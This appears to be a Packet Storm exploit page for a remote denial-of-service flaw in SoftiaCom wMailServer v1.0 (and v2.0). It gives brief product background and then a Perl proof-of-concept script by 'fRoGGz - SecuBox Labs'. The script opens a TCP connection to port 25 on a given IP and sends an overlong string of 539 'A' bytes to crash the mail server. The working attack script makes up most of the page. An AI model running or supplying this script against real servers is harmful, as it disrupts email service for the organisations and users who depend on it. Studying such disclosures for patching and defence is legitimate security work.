SoftiaCom's wMailserver version 1.0 remote denial of service exploit.
7557765c5ef49c4ab55aadfbc153e91e9aff67989be5d12841a7ee97cfa367caSoftiaCom MailServer v2.0 - Denial Of Service
Software: wMailServer
Corporation: SoftiaCom Software
Version: v1.0 (v2.0 is the same...)
Vulnerability: Denial of Service
------------------------------------------
BACKGROUND
__________
SoftiaCom design and build software utilities in communication and network server.
WMailserver is an internet email server able to listin in the appropriate mail port
to fetch incoming emails from the net. You can add users and manage them, avoid spam.
Source: www.softiacom.com
Proof of Concept
________________
#!/usr/bin/perl
# -----------------------------------------------------
# Vulnerability: Denial Of Service - Crash
# Discovered on: July 9, 2005
# Coded by: fRoGGz - SecuBox Labs
# Severity: Normal
# -----------------------------------------------------
$boulet = $ARGV[0];
use IO::Socket;
print "\n\nSoftiaCom Software - wMailServer v1.0\r\n";
print "Denial Of Service - Crash Vulnerability\r\n";
print "---------------------------------------------\r\n";
print "Discovered & coded by fRoGGz - SecuBox Labs\r\n\n";
if(!$ARGV[0]) {
die "Utilisation: ./wms_poc.pl <ip>\n";
}
print "[ ] Connexion sur $boulet\n";
my($suckette) = "";
if ($suckette = IO::Socket::INET->new(PeerAddr => $boulet,PeerPort => "25",Proto => "TCP"))
{
print $suckette " " . "\x41" x 539 . "\r\n";
print "[ ] Emission du paquet malicieux ...\n";
sleep 2;
close $suckette;
print "[ ] Mission terminée !\n\n";
}
else
{
print "[-] Impossible de se connecter sur $boulet\n";
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed